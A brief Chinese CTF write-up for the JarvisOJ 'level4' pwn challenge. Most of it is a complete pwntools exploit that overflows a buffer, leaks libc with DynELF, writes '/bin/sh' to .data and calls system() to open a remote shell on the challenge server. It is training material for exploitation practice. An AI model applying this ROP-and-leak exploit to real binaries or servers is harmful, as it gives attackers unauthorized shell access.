[JarvisOj](pwn)level4

---

简介 :

nc pwn2.jarvisoj.com 9880
https://dn.jarvisoj.com/challengefiles/level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0

---

考点 :

无 libc 环境
pwntools库 DynELF 的使用

---

利用代码 :

#!/usr/bin/env python
# coding:utf-8

from pwn import *

Io = remote("pwn2.jarvisoj.com", 9880)
# Io = process("./level4")

# raw_input("GDB...")

def leak(addr):
    junk = "A" * (0x88 + 4)
    write_plt = p32(0x08048340)
    start_addr = p32(0x08048350)
    count = p32(4)
    buf = p32(addr)
    fd = p32(1)
    payload = junk + write_plt + start_addr + fd + buf + count
    Io.send(payload)
    leaked = Io.recv(4)
    print "[%s] -> [%s] = [%s]" % (hex(addr), hex(u32(leaked)),  repr(leaked))
    return leaked

# leak the address of system()
d = DynELF(leak, elf=ELF("./level4"))
system_addr = d.lookup('system', 'libc')
print "[system()] -> [%s]" % (hex(system_addr))

data_addr = 0x0804A01C # actually is the address of .data

# write /bin/sh
junk = "A" * (0x88 + 4)
read_plt = p32(0x08048310)
start_addr = p32(0x08048350)
count = p32(8)
buf = p32(data_addr)
fd = p32(0)
payload = junk + read_plt + start_addr + fd + buf + count
Io.send(payload)


# send /bin/sh
Io.send("/bin/sh\x00")

# call system
junk = "A" * (0x88 + 4)
system_addr = p32(system_addr)
null_addr = p32(0xFFFFFFFF) # who care ?
bin_sh_addr = p32(data_addr)
payload = junk + system_addr + null_addr + bin_sh_addr
Io.send(payload)


# interactive()
Io.interactive()